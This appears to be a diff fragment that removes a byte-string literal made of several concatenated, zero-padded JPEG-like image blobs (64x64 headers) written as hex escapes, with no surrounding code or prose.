-"\xaa\xf8\x64\x3c\x63\x1e\xc4\x13\x9a\x86\xd0\x89\x2f\xdd\xed\xe1" -"\x9a\x28\x24\x42\x67\x49\x53\x68\xf3\x32\x31\x80\x7b\xe3\x39\xc7" -"\x1d\x2a\xfa\xc0\xed\x12\xad\xb3\x24\x4a\xac\x07\xdd\xc8\x00\x1e" -"\x40\x1d\xbd\x3d\xaa\xdd\x95\x92\x33\x57\x95\xdb\xd8\x58\x02\xc9" -"\x3b\xc3\xe5\xba\xaa\xa8\x25\xb6\xe1\x4e\x73\xc0\x3e\xbe\xb5\x6a" -"\x08\x63\xb7\x81\x21\x81\x02\x46\x83\x6a\xa8\xe8\x05\x3f\xa5\x2d" -"\x49\x65\x1a\x28\xaa\x57\xba\x83\x5b\x48\xd1\xc3\x07\x9c\xea\x01" -"\x23\x7e\xdc\x96\xce\xd5\x1c\x1c\x93\x83\xf4\xa4\x93\x93\xb2\x1c" -"\xa4\xa2\xae\xc5\xba\xb8\xba\x6b\x86\xb6\xd3\xd2\x23\x32\x2a\xbb" -"\x34\xa4\x85\x19\x3c\x0e\x39\xc9\xc1\xfa\x55\x2b\x45\x96\xfa\xca" -"\x4b\x58\xda\x25\xb7\x32\x30\x94\x36\x7c\xc8\xf2\xd9\x65\xc7\x43" -"\xce\x70\xde\x95\x7a\x48\x52\xec\x0b\x9b\x79\x5e\x39\x36\x94\xdd" -"\x1b\xe3\x38\x27\xe5\x3c\x1e\x87\x3c\xfd\x68\xb0\xb0\x95\x60\x98" -"\x47\x34\x51\xca\xc0\x26\x50\x6e\x58\x80\x1c\x0c\x1e\x49\xe4\x9c" -"\x9e\xb9\xad\x53\x49\x69\xb9\x8b\x4d\xca\xef\x62\xe2\x16\x7b\xa5" -"\x8c\xc7\x26\xd2\xa5\x8c\x9f\xc2\x39\xe9\xf5\xff\x00\x0a\xb3\x04" -"\x11\x5b\xc7\xe5\xc1\x1a\xc6\x99\x27\x0a\x3b\x93\x92\x7f\x3a\x78" -"\x18\x00\x0e\xd4\xb5\x99\xa8\x51\x45\x54\xd4\x2f\x56\xca\x15\xc2" -"\x19\x67\x90\xec\x86\x15\xeb\x23\x7a\x7b\x0e\xe4\xf6\x14\xd2\xbe" -"\x88\x4d\xa4\xae\xc0\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" -"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" -"\x11\x03\x11\x00\x3f\x00\xf5\x5a\xe3\x9c\xca\x67\x98\xce\x00\x93" -"\xcd\x7c\x80\x3f\xda\x38\xfd\x31\x5d\x8d\x71\xa5\x4a\x4d\x32\xb4" -"\x82\x43\xe7\x49\xf3\x03\x9f\xe2\x35\xe6\xe6\x7f\xc1\x5e\xbf\xa3" -"\x3a\xf0\x7f\xc4\xf9\x7f\x90\x51\x59\x77\xd1\xc6\xda\x96\xeb\xd8" -"\x5e\xe2\xdc\x44\x04\x68\xa8\x5c\x2b\xe4\xe4\x95\x1d\xc8\xdb\x83" -"\xdb\x07\xa7\x7a\x16\x48\x1a\xd6\xd4\xdf\xc1\x3c\xb6\xcb\xe7\x00" 
-"\x8c\x0c\xbb\x5b\xcc\x38\xdc\x06\x73\xc7\x00\xf3\x8e\x7d\x6b\xc8" -"\x8d\x1b\xc6\xf7\xfe\xb5\x3b\xdd\x4b\x3b\x58\xe8\xe8\xac\x4b\x56" -"\x9a\xce\x68\x27\xb8\x5b\xaf\xb3\xb2\xca\x8a\x0a\xb3\x94\x05\xc1" -"\x4d\xc0\x64\xf4\xe9\x9e\x9d\x0d\x33\xec\xfa\x8c\x56\xb6\xf3\x5a" -"\xab\x89\xa6\x0d\x14\x81\x8f\x31\xab\x31\x65\x72\x3d\x54\x1e\x9e" -"\xf4\x7b\x05\xdf\xfa\xd4\x3d\xa7\x91\xbd\x5a\xfe\x15\xd8\x2c\xee" -"\x16\x37\x2c\x3c\xf6\x27\x23\x18\x27\xa8\xac\x58\x62\x48\x20\x48" -"\x63\x04\x22\x28\x51\x9f\x41\x5b\x3e\x15\x74\x7b\x5b\x9d\x91\xec" -"\xc4\xec\x0f\x39\xc9\xf5\xae\xec\xaf\xe3\x95\xbb\x7e\xa7\x36\x37" -"\xe1\x89\xb9\x5c\x6b\x88\xe3\xbb\xba\x86\x32\xd9\x8e\x67\xc8\x6e" -"\xa3\x24\x9f\xcb\x9e\x2b\xb2\xaa\xb7\xba\x75\xa5\xf2\x15\xb8\x8b" -"\x24\xe3\xe6\x52\x55\xb8\xf7\x1c\xd7\xa7\x89\xa1\xed\xe9\xf2\x5e" -"\xda\x9c\x74\x6a\x7b\x29\x73\x58\xe4\xa7\xb5\xb7\xb8\x60\xd3\x44" -"\xae\x40\x2b\x92\x39\xc1\xea\x3e\x95\x22\x22\xc6\x8a\x91\xa8\x55" -"\x51\x80\xaa\x30\x00\xad\xe7\xf0\xfe\x9c\xd1\xa2\xb2\x4a\x16\x3e" -"\x98\x99\x87\xe6\x73\xcf\xe3\x48\x9a\x3e\x95\x31\x5b\xd4\x2c\xca" -"\x46\xe0\xeb\x33\x6c\x23\xd7\x19\xc6\x2b\xce\xfe\xcc\x9b\x56\xe7" -"\x3a\xbe\xb9\x1b\xfc\x26\x1d\x15\xb6\xba\x26\x94\x8e\x62\x05\xc3" -"\xcc\xa4\xed\x33\xb6\x48\xf5\x1c\xff\x00\x2a\x51\xa0\xe9\x6f\x19" -"\x81\x44\x84\x23\x64\x81\x3b\x6e\x07\x1d\xce\x73\xd0\xf4\xa5\xfd" -"\x95\x2f\xe6\xfc\x07\xf5\xe5\xd8\xc3\xad\x2f\x0f\x8b\xbb\x9d\x3e" -"\x47\x8e\xe3\xc9\x1e\x73\x05\x26\x3c\xe5\x7b\x70\x6a\xe3\x78\x7f" -"\x4e\x67\x8d\xda\x27\x26\x3c\x6d\x06\x46\xc7\x1d\x32\x33\xcf\xe3" -"\x5a\x31\xc6\xb1\xa0\x44\x18\x51\x5d\x78\x5c\x12\xa1\x76\xdd\xee" -"\x61\x5b\x10\xea\x5a\xcb\x61\xf4\x51\x54\xf5\x25\xbc\x95\x12\x0b" -"\x33\xe5\xf9\xa7\x12\x4f\x91\x98\xd7\xbe\x07\xa9\xe8\x3d\x3a\xd7" -"\xa0\x95\xd9\xca\xdd\x90\xba\x85\xac\x97\xa8\x90\x79\xbb\x2d\xd8" -"\xfe\xf8\x0f\xbc\xeb\xfd\xd0\x7b\x03\xdf\xda\xb2\x7c\x50\xc6\x68" -"\xad\x34\x2b\x5c\x23\x5e\xb8\x56\x0a\x31\xb2\x25\xe5\x8f\xe9\x5b" 
-"\xb0\x42\x96\xf0\x24\x31\x82\x12\x35\x0a\x32\x73\xc0\xf7\x35\x81" -"\xa0\x0f\xed\x5d\x72\xfb\x5b\x7e\x62\x53\xf6\x6b\x5f\xf7\x47\x52" -"\x3e\xa7\xfa\xd6\xb4\xdd\xbd\xee\x8b\xf3\x31\xa8\xaf\xee\xf5\x7f" -"\x97\x50\xf1\x45\xb1\xb1\xb5\xb2\xd5\x6c\xd0\xef\xd3\x18\x7c\xa3" -"\xbc\x47\x82\x3f\xcf\xbd\x6c\x43\x05\xac\xd7\x11\xea\x50\x7d\xe9" -"\x23\x03\x72\x9c\x09\x14\xf2\x32\x3b\xfb\x54\xf3\xc3\x1d\xc4\x0f" -"\x0c\xaa\x1a\x39\x14\xab\x03\xdc\x1a\xc4\xf0\x9c\xaf\x0c\x37\x3a" -"\x44\xed\x99\x74\xf9\x36\x02\x7f\x8a\x33\xca\x9a\x2e\xe5\x0f\x35" -"\xf9\x3f\xf8\x3f\x98\xec\xa3\x3f\x27\xf9\xaf\xf8\x1f\x91\xb1\x6f" -"\x75\x0d\xc3\xca\x91\x3e\x5e\x17\xd8\xea\x46\x0a\x9f\xa7\xa1\xec" -"\x7b\xd4\xf5\x5a\x6b\x28\x65\xbc\x8a\xef\xe6\x49\xe2\xe3\x7a\x1c" -"\x6e\x5f\xee\xb7\xa8\xef\x4f\x4b\x98\x5e\xe6\x4b\x75\x90\x19\xa2" -"\x00\xb2\x77\x00\xf4\x3f\x4a\xc9\xa5\xd0\xd1\x37\xd4\x83\x52\xb9" -"\x9a\x24\x8e\x0b\x38\xf7\xdc\xce\x4a\xa1\x23\xe5\x4f\x56\x6f\x61" -"\xe9\xdf\xa5\x5a\x85\x1a\x38\x51\x1e\x46\x95\x95\x40\x2e\xc0\x02" -"\xc7\xd7\x8a\x22\xf3\x3c\xa4\xf3\xb6\xf9\x98\x1b\xb6\xf4\xcf\x7c" -"\x7b\x53\xe8\x6f\x4b\x0d\x2d\x6e\x63\x78\xaa\xf9\xed\x34\x76\x8a" -"\xdf\x9b\xab\xb6\x10\x42\x07\x5c\xb7\x19\xfc\xbf\xa5\x5e\xd2\xec" -"\x53\x4d\xd3\x2d\xec\xe3\xe9\x12\x05\x27\xd4\xf7\x3f\x89\xcd\x63" -"\xc7\xff\x00\x13\x7f\x18\xbc\xbd\x6d\xb4\xa5\xd8\xbe\x86\x56\xeb" -"\xf9\x0f\xe5\x5d\x1d\x69\x3f\x76\x2a\x3f\x33\x28\x7b\xd2\x73\xf9" -"\x05\x73\xba\xd7\xfc\x4a\xbc\x45\x63\xab\x29\xc4\x33\xff\x00\xa2" -"\xdc\x7a\x60\xfd\xd3\xfe\x7d\x2b\xa2\xaa\x5a\xcd\x82\x6a\x9a\x4d" -"\xc5\x9b\xe3\x32\x27\xca\x4f\x66\xea\x0f\xe7\x8a\x54\xe4\x94\xb5" -"\xd8\xaa\x91\x72\x8e\x9b\x97\x6a\xa5\xed\x84\x77\x6d\x1c\xa1\xda" -"\x1b\x88\x8e\x63\x99\x3a\xaf\xa8\xf7\x07\xb8\x35\x53\xc3\x1a\x83" -"\x6a\x1a\x2c\x4d\x36\x45\xc4\x24\xc3\x30\x3d\x43\xaf\x1c\xfe\x87" -"\xf1\xad\x6a\x96\x9c\x25\x61\xa6\xa7\x1b\x80\xff\xd9\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08" -"\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda" -"\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x99\xe2\x41" -"\x74\x65\x04\xef\x64\x0a\x46\xee\x30\x09\xc7\x1f\x89\xa6\xd2\xcc" -"\xb0\x0b\xc6\x75\xd9\xe7\x94\x01\xf0\x7e\x6d\xb9\x38\xc8\xf4\xce" -"\x69\x29\x3d\xc7\x1d\x82\x8a\x8e\xe1\x25\x92\x30\xb0\xcd\xe4\xb6" -"\xe5\x25\xb6\x06\xc8\x07\x91\x83\xea\x38\xcf\x6a\x81\x92\x68\xe5" -"\x57\x97\x50\x45\x8f\xce\x67\x28\xc8\xab\xb9\x08\xe1\x33\x9e\xc7" -"\x9c\xf5\x34\x8a\x2d\xd1\x4d\xf3\x23\xf9\x7f\x78\x9f\x37\xdd\xf9" -"\x87\xcd\xf4\xf5\xa1\xa4\x8d\x5b\x6b\x48\x8a\xd9\xc6\x0b\x00\x69" -"\x5d\x05\x98\xea\x29\x0b\xa0\x60\xa5\xd4\x31\xe8\xa5\x86\x4f\xe1" -"\x4a\x48\x50\x4b\x10\xa0\x75\x24\xe0\x53\xb8\x58\x86\x74\x63\xa8" -"\x6d\x4b\xa4\xf3\x15\x14\xc8\xbe\x58\xdc\x57\x27\x19\x3e\xe4\x1a" -"\x16\x39\xc3\xb9\x6b\x8c\xa9\x07\x68\xd8\x3e\x5f\x4f\xad\x5b\xbc" -"\x0e\x3c\xb6\x8e\x16\x94\x96\x0a\xdb\x70\x0a\x83\xdf\x9e\xa0\x54" -"\x54\x9c\x15\xef\xfa\x82\x9b\xdb\xf4\x20\x11\x5c\x79\x45\x4d\xcf" -"\xcf\x9c\x86\xf2\xc7\x03\xd3\x15\x57\x53\xb7\x96\x6b\x58\xa2\x30" -"\x7d\xa4\xef\xf9\xdc\x05\x04\x2f\x7c\x67\xa1\x3d\x2b\x46\x8a\x87" -"\x4d\x35\x63\x48\xd4\x71\x97\x31\x8f\x73\x67\x23\xc9\x39\x36\x0b" -"\x37\x9e\x8a\xb1\x16\x61\xfb\x8e\x31\x8f\x6c\x75\xe2\x92\xe3\x4d" -"\x92\x44\xbc\x32\x44\xb3\x4a\x61\x8d\x23\x73\x8c\x96\x03\xe6\x23" -"\xd2\xb6\x68\xa9\x74\x22\xcd\x16\x26\x6b\x6f\xeb\x6f\xf2\x31\x2e" -"\x74\xf9\xe4\xbb\x9c\x3a\x4b\x22\xcc\xc0\xab\xa1\x41\xb4\x7b\x92" -"\x32\x31\xed\x56\xf5\x90\xa2\xd6\x16\x90\xab\xa2\x4a\xa5\x91\xce" -"\x04\x98\xec\x4f\x4f\x7e\x78\xa4\xd4\x35\x1b\x88\x2f\x12\xd2\xca" -"\xc8\x5c\xcc\x63\xf3\x5b\x74\x81\x15\x57\x38\xeb\xeb\x9a\x80\xdf" -"\x6b\x2c\xa4\x36\x89\x03\x03\xd4\x1b\x90\x47\xf2\xab\x58\x6d\x1d" -"\x9e\xfd\xda\x33\x78\xbf\x79\x5d\x6d\xd9\x33\xa6\xaa\xef\x6a\x0d" -"\xc3\x4c\x24\x93\x2c\xa1\x76\x13\xf2\xf1\xdf\x1d\x8d\x58\xa2\xb5" 
-"\x30\x33\xa1\x95\x66\x8f\x7a\x86\x03\x24\x61\x94\xa9\x04\x1c\x1e" -"\x0d\x3e\xac\x5d\x44\xf2\xc2\x56\x19\x04\x72\x71\x87\x2b\xbb\x1c" -"\xfa\x55\x79\x0a\xa4\xc2\x22\xca\x1c\x82\xc1\x73\xc9\x1e\xb8\xa4" -"\xd0\xd3\xee\x14\x51\x45\x22\x8c\xd6\xc7\xfc\x24\xa7\xd7\xec\x6b" -"\xff\x00\xa1\xb5\x6a\x8d\x9e\x57\x6c\xe2\xb0\xf5\xb8\x1f\xed\x2b" -"\x75\x67\xa9\xc3\x67\x76\xb1\x6c\x2b\x2e\x08\x75\xce\x7b\xf4\xe7" -"\x35\xcf\x7f\x69\xf8\x87\xcf\xd9\xf6\xd8\x3c\xac\xe3\xcc\xc4\x7f" -"\x9e\x3a\xd7\x44\x68\xba\x8a\xe9\xa3\x96\x55\x95\x27\x66\x9f\xc8" -"\xf4\x43\x3c\x42\xe0\x5b\x99\x17\xcd\x2b\xbc\x26\x79\x23\xa6\x6a" -"\x4a\xab\x7f\x63\x1d\xec\x6a\x19\x9a\x39\x63\x3b\xa2\x99\x38\x68" -"\xdb\xd4\x7f\x87\x43\x53\x2b\x88\xc4\x71\xcd\x2a\x19\x58\x63\xd3" -"\x79\x03\x9c\x0a\xcb\x4b\x68\x6d\x77\x7d\x49\x29\x8d\x1a\x3b\x06" -"\x64\x52\xcb\x9c\x12\x39\x19\xeb\x8a\x7d\x14\x86\x51\x09\x38\x32" -"\x79\xa8\xa1\x43\x61\x0a\xb6\x72\xbd\x89\xf4\x34\x55\xb9\x63\x49" -"\xa2\x78\xa5\x5d\xc8\xe0\xab\x0f\x51\x55\x66\x4f\x20\xc2\x91\x45" -"\x23\xa3\x1d\x99\x1c\xec\xc0\xe0\x9c\x9c\xe3\x8e\xbc\xd1\x60\x4e" -"\xdb\x94\x6e\x34\xab\x6b\x8b\xa6\xb9\x76\x9d\x65\x65\x0a\x4a\x4a" -"\x57\x81\xd0\x71\xf5\x34\xcf\xec\x6b\x6f\xf9\xed\x77\xff\x00\x81" -"\x0d\x5a\x14\x51\xcf\x2e\xe1\xec\xe3\xd8\xff\xd9\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" -"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" -"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x7a\x29\xa2\x48" -"\xca\x96\x12\x21\x00\x64\x90\xc3\x00\x50\x24\x42\xa1\x83\xa1\x52" -"\x70\x18\x30\xc1\x3f\x5a\x8b\xa2\xec\xc7\x51\x49\xbd\x37\x6d\xde" -"\xbb\xba\x63\x3c\xd3\x64\x95\x23\x89\xe4\x66\x1b\x50\x12\xd8\x3e" -"\x94\x5d\x0e\xcc\x7d\x15\x0d\xad\xd2\x5c\x41\x1c\xa3\x08\x64\x19" -"\x08\xcc\x33\xfa\x1a\x9a\x84\xd3\x57\x40\xd3\x8b\xb3\x0a\xce\xb8" -"\x76\x6b\x99\x03\x46\x50\x29\xc0\x24\xfd\xe1\x81\xcf\xf9\xf4\xad" 
-"\x1a\xce\xb8\x32\x1b\x99\x3c\xc4\x0a\x01\xc2\xe0\xe7\x2b\x81\xcf" -"\xb7\x7a\xa4\x43\x28\x5b\xc3\xf6\xb4\xbc\x7b\x6b\x78\xd6\x3f\x3e" -"\x36\x30\x82\x0a\xba\x80\x72\xb9\x1c\x77\xcf\xa5\x58\x36\x73\x18" -"\xe6\x96\x2b\x51\x0a\x99\x63\x91\x2d\xc3\x0e\x76\xf5\x3e\x80\x9a" -"\x9b\x4f\xd4\x64\x92\x59\xed\xae\xec\xd6\xce\x48\x63\x12\xed\x47" -"\x0e\xbb\x4e\x7d\x07\x5e\x0d\x58\xfe\xd2\xb5\xfd\xd6\x64\x23\xcd" -"\x01\x97\x23\x1c\x1e\x06\x6b\x99\xd1\x8c\x34\x93\xd7\xe5\xfd\x75" -"\x3b\x16\x26\x55\x35\x82\xd3\xe7\xd3\xfe\x1b\xd4\xa8\x6d\x6e\x64" -"\x82\xe2\xe5\x63\xf2\xae\x4c\xfe\x74\x2a\x48\x24\x60\x63\x07\xb7" -"\x23\x35\x3a\x5b\x34\x3a\x7f\xd9\x04\x5e\x69\x92\x27\x2e\xe4\x8c" -"\x6f\x23\xb8\xf7\x35\x22\x6a\x16\xcf\xb7\x0e\x46\xec\x6d\xca\x91" -"\x90\x73\xc8\xf6\xe0\xf3\xed\x44\x5a\x8d\xac\xcc\xab\x14\x9b\x8b" -"\x1c\x01\x8f\x62\x7f\xa1\xa1\x46\x1d\x18\xa5\x2a\x8d\x6b\x1d\x8a" -"\xfa\x6d\x93\x43\x70\x24\x96\x15\x52\xb6\xf1\xa2\x9e\x38\x60\x3e" -"\x6a\xd2\xaa\x89\xa9\x5b\x39\x40\xac\xc7\x79\x0a\x3e\x43\xc9\x23" -"\x3f\xca\xad\xd6\x94\xd4\x52\xb4\x4c\xea\xb9\xca\x57\x9a\x0a\xce" -"\x9f\xcd\xfb\x4c\x9e\x6e\xcc\x6e\xf9\x36\xff\x00\x77\x03\xaf\xbe" -"\x73\x5a\x35\x9d\x3a\xb8\xb9\x90\xbb\x86\x05\xb2\xa3\x18\xda\x30" -"\x38\xf7\xef\xcf\xbd\x6a\x8c\x19\x15\xbf\xcd\xe2\x7b\xd5\xe4\x0f" -"\xb2\x20\xc8\xe3\xf8\x9a\xa6\x8a\x2d\x35\x58\xf9\x6e\x00\x87\x1b" -"\x98\x3f\x07\x24\x90\x09\xef\xce\x6a\xa6\x8f\x6e\x24\x69\xa4\xbb" -"\xd4\xe1\xbb\xbb\xb8\x84\x46\xcb\x0e\x17\x62\x73\xd8\x7d\x7a\xd5" -"\xa7\xd2\xbc\xc0\x4c\x93\x65\xf2\xb8\x21\x30\x00\x0a\x46\x30\x3e" -"\xb5\x38\x84\xf9\x92\x4a\xf6\x34\xc3\x35\xca\xf9\x9d\xae\x4e\xd0" -"\xd9\xc0\x21\x77\x28\xa2\x24\x29\x19\x76\xe8\xa4\x73\xf5\xe2\x98" -"\x2d\x6c\x55\x0c\x02\x42\xa5\x30\xdc\x4b\x86\x40\x06\x07\x3d\x40" -"\xc1\xa7\xc9\x63\x1b\xc5\x0c\x64\x8d\xb1\x23\x20\x18\xcf\x55\xc5" -"\x40\xfa\x4a\xba\x3a\x19\x8e\xc6\x04\xfd\xd1\x9d\xc5\x76\x93\x9f" -"\x4f\x6a\xc5\xc5\xf4\x89\xbc\x65\x1e\xb3\x63\xc4\x3a\x71\x40\x8b" 
-"\x2a\x6d\x04\x49\xb5\x65\xe3\xe5\xc0\xcf\xd0\x60\x55\x89\xee\xe2" -"\x82\x31\x2b\x96\x65\x6c\x9c\xa2\xee\xe3\x19\x27\xe9\x8a\x82\x5d" -"\x36\x37\x2c\x41\x03\x73\x3b\x11\xb4\x63\xe6\x00\x63\xf4\xa7\x4b" -"\x66\xf2\x59\x45\x6c\x2e\x18\x04\xc0\x62\x57\x3e\x60\x1d\x8f\xb5" -"\x35\xcc\xaf\x64\x27\xc8\xda\xbc\x8b\x60\x82\x01\x1d\x08\xc8\xac" -"\xeb\x84\x65\xb9\x90\xb4\x8c\xfb\x8e\xe1\x9f\xe1\x18\x1c\x0f\x6f" -"\xf1\xad\x11\xd3\x9a\xce\x9e\x30\x97\x32\x90\xcc\x77\xb6\xe3\xb8" -"\xe7\x1c\x01\x81\xe8\x38\xad\xd1\xcb\x22\x6b\x4d\x36\xda\xd2\x77" -"\x9e\x2f\x31\xa5\x75\x08\x5e\x47\x2e\x42\xe7\x38\x19\xf7\xab\x74" -"\x51\x43\x6d\xea\xc6\x92\x5a\x20\xa2\x8a\x29\x0c\x28\xa2\x8a\x00" -"\x2b\x36\x68\xe3\x4b\x99\x8c\x78\xcb\xb6\xe7\xc1\xcf\xcd\x81\xfe" -"\x02\xb4\xab\x36\x6f\x27\xed\x33\x79\x3b\x73\xbf\xf7\x9b\x7f\xbd" -"\x81\xd7\xdf\x18\xaa\x44\xc8\xff\xd9\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40" -"\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01" -"\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa2\x0c\xa5\x9f\xce\x54" -"\x56\xde\xd8\xda\x73\xf2\xe7\x8f\xc7\x15\x7a\xa8\x81\x28\x67\xf3" -"\x99\x59\xb7\xb1\x05\x46\x3e\x5c\xf0\x3e\xb8\xa1\xec\x0b\x70\xa2" -"\x8a\x2a\x4b\x0a\x28\xa2\x80\x0a\x28\xa5\x51\x96\x00\x77\xa0\x0b" -"\xb5\x47\x63\xa3\x38\x92\x4f\x30\x97\x62\x0e\x31\x80\x4f\x03\xf0" -"\x1c\x55\xea\xa2\x23\x31\x33\xa9\x76\x7c\xbb\x36\x58\xf2\x32\x73" -"\x8f\xa0\xe9\x54\xf6\x21\x6e\x14\x51\x45\x49\x61\x45\x14\x50\x01" -"\x4e\xb5\x48\x2e\x96\x2b\xa5\xf9\xf6\x96\xf2\xdb\x91\x8e\xa0\xf1" -"\xf9\xd3\x54\x48\x6e\x23\x55\x8b\x74\x67\x3b\xdf\x76\x36\xf1\xc7" -"\x1d\xf3\x57\xaa\x91\x0f\x50\xaa\x02\x24\x85\xa4\x58\xc9\x21\x9d" -"\x9c\xe5\xb3\xc9\x39\x35\x7e\xa8\x2a\xc2\xad\x20\x83\x6e\xd3\x23" -"\x13\xb4\xe7\xe6\xcf\xcd\xfa\xe6\x87\xb0\x2d\xc5\xa2\x8a\x2a\x4b" -"\x0a\x55\x05\x98\x01\xde\x92\x9d\x6d\x1d\xbd\xc3\xad\xca\x91\x23" 
-"\xc4\x59\x01\x04\xfc\xa7\xa3\x0c\x7a\xf1\x4d\x21\x37\x62\x7b\x68" -"\xe4\x8a\xdd\x52\x59\x7c\xd7\x1d\x5f\x68\x5c\xfe\x02\xa5\xa2\x8a" -"\x64\x85\x67\xa3\x42\xc6\x43\x6f\xb7\x6f\x98\xc0\xed\x18\xf9\xb3" -"\xf3\x7e\x39\xcd\x68\x55\x01\x2a\x4c\xd2\x34\x60\x80\xae\xc8\x72" -"\xb8\xe4\x1c\x1f\xff\x00\x5d\x0f\x60\x5b\x8b\x45\x14\x54\x96\x15" -"\x3d\x9c\xb1\xcb\x06\x62\x04\x05\x66\x53\x95\xc7\x20\xe0\xfe\xb5" -"\x05\x58\xb4\x97\xcd\x87\x3e\x5b\xa6\x18\xae\x18\x63\x38\x38\xcf" -"\xd0\xd3\x44\xb2\x6a\x28\xa6\xb3\x2a\x90\x19\x80\x2c\x70\x32\x7a" -"\x9a\x62\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xf4\x70\x24\x32\xc6\x12\x2d\xe8\x5b\x0e\xdb\xb1" -"\xb4\x63\xaf\xbf\xa5\x5e\xa8\x6d\x62\x92\x18\x02\x4b\x2f\x9a\xf9" -"\x24\xb6\xdd\xbd\xf8\x18\xf6\x1c\x54\xd4\x06\xe1\x4d\x93\x7f\x96" -"\xde\x56\xdd\xf8\x3b\x77\x74\xcf\x6c\xd3\xaa\x85\xab\xcf\x73\xa9" -"\x4f\x33\x17\x8e\xda\x1c\xc3\x1a\x1e\x37\xb7\xf1\x31\xf6\xec\x3f" -"\x1f\x5a\x69\x09\xbe\x84\xba\x6d\x98\xb1\xb2\x48\x4b\x99\x24\xc9" -"\x69\x24\x3d\x5d\xcf\x2c\x7f\x3a\xb5\x45\x14\x37\x77\x76\x09\x59" -"\x59\x05\x53\xd6\x7f\xe4\x09\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\xae" -"\x55\x3d\x67\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x69\xc7\xe2\x42" -"\x97\xc2\xcb\x94\x51\x48\xcc\xa8\xa5\x98\x85\x50\x32\x49\x38\x00" -"\x54\x94\x56\xbb\xbc\xfb\x3c\xf6\xd0\x24\x7e\x64\xb7\x0f\x80\xb9" -"\xc6\x14\x72\xcc\x7d\x80\xfd\x48\x1d\xea\xd5\x57\x8a\x1b\x79\x2e" -"\x05\xf4\x78\x77\x92\x30\xaa\xe0\xe4\x6d\xeb\xc7\xd7\x3f\xca\xac" -"\x53\x76\x12\xb8\x51\x45\x14\x86\x15\x4f\x59\xff\x00\x90\x25\xf7" -"\xfd\x7b\xc9\xff\x00\xa0\x9a\xb9\x54\xf5\x9f\xf9\x02\x5f\x7f\xd7" -"\xbc\x9f\xfa\x09\xaa\x8f\xc4\x89\x97\xc2\xcb\x95\x4f\x53\xb5\x92" -"\xfa\x04\xb6\x0c\x16\x17\x71\xe7\xfa\xb2\x77\x51\xf5\xe0\x1f\x6c" 
-"\xd4\xf7\x57\x11\xda\xda\xc9\x71\x2e\x76\x46\xa5\x8e\x06\x49\xf6" -"\x1e\xf5\x16\x9a\x2e\x7e\xc6\xaf\x7a\xdf\xbf\x90\x97\x65\xec\x99" -"\xe8\xa3\xe8\x38\xa1\x5d\x7b\xc0\xec\xfd\xd2\xc8\x00\x00\x00\xc0" -"\x1d\xa9\x68\xa2\xa4\xa0\xa2\x8a\x28\x00\xaa\x7a\xcf\xfc\x81\x2f" -"\xbf\xeb\xde\x4f\xfd\x04\xd5\xca\xa7\xac\xff\x00\xc8\x12\xfb\xfe" -"\xbd\xe4\xff\x00\xd0\x4d\x54\x7e\x24\x4c\xbe\x16\x3e\x1b\xc5\x9e" -"\xfa\x7b\x68\xd0\x91\x00\x50\xf2\x76\xdc\x79\xdb\xf5\x03\x07\xf1" -"\x15\x66\xa0\xb3\xb5\x8e\xce\x0f\x2a\x2d\xc4\x16\x2e\xcc\xc7\x25" -"\x89\x39\x24\x9a\x9e\x93\xb5\xf4\x1a\xbd\xb5\x0a\x28\xa2\x90\xc2" -"\x8a\x40\x41\x19\x07\x20\xd2\xd0\x01\x55\x75\x48\xde\x6d\x2a\xee" -"\x28\x97\x73\xbc\x2e\xaa\x3d\x49\x53\x8a\xb5\x45\x34\xec\xee\x26" -"\xae\xac\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xf4\x2f\x0d\x7f\xc8\xb7\xa7\xff\x00\xd7\x05\xfe" -"\x55\xa7\x59\x9e\x1a\xff\x00\x91\x6f\x4f\xff\x00\xae\x0b\xfc\xab" -"\x4e\xae\xa7\xc4\xc8\xa7\xf0\x20\xa8\x2f\x2d\xa3\xbc\xb4\x92\xde" -"\x5c\xec\x90\x63\x23\xa8\xf4\x23\xdc\x1e\x6a\x7a\x2a\x13\xb1\x6d" -"\x5f\x41\x90\xab\xa4\x28\x92\x3f\x98\xea\xa0\x33\xe3\x1b\x8f\xae" -"\x29\xf5\x42\xf2\x39\xa1\xd4\x20\xbc\x81\x5e\x40\x71\x0c\xd1\x83" 